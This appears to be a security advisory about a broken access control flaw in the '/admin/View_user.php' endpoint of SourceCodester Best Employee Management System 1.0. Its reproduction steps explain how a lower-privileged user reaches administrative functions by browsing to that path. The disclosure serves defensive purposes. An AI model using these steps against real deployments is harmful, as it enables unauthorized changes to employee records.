SourceCodester Best Employee Management System Access Control Vulnerability in Administrative Endpoint

A critical access control vulnerability has been identified in SourceCodester Best Employee Management System version 1.0. The issue resides in the administrative endpoint file '/admin/View_user.php', where improper access controls allow lower-privileged users to perform administrative functions. This vulnerability can be exploited remotely, leading to unauthorized actions such as creating, viewing, and deleting employee records.

Impact

Exploitation of this vulnerability allows lower-privileged users to access administrative functionalities without proper authorization, violating the principle of least privilege. This can result in unauthorized manipulation of employee records, potentially leading to data integrity issues.

Reproduction

To reproduce this vulnerability, log into the application as an admin to verify the administrative functions. Then, log out and log in as a lower-privileged user. Access the administrative endpoint '/admin/View_user.php' by appending it to the base URL. Once the page is loaded, the restricted admin functionalities will be accessible, allowing the user to perform actions such as deleting or creating employee records.